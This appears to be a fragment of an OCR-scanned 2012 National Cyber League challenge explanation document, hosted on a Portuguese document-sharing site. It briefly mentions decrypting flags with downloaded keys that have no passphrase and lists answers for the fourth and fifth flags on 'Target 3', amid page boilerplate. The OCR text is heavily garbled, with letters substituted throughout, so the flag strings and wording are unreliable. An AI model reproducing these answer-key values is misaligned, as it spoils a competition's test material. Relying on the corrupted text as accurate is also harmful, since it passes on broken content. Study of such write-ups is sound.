files, &N&"C*T anu N4Z"C*T. At that point the playei can
uownloau anu impoit the keys (which have no passphiase),
ueciypting the fouith anu fifth flag.

WhaL ls Lhe fourLh flag found on 1argeL 3? nCL-nlu!-4726
WhaL ls Lhe flfLh flag found on 1argeL 3? nCL-LCnk-4237

National Cyber Leauge 2012 Challenge Explanations

Enviado por

Dados do documento

Direitos autorais

Formatos disponíveis

Compartilhar este documento

Compartilhar ou incorporar documento

Opções de compartilhamento

Você considera este documento útil?

Este conteúdo é inapropriado?

Direitos autorais:

Formatos disponíveis

National Cyber Leauge 2012 Challenge Explanations

Enviado por

Direitos autorais:

Formatos disponíveis

Foi Public Release

Copyright 2012 iSIGHT Partners

Você também pode gostar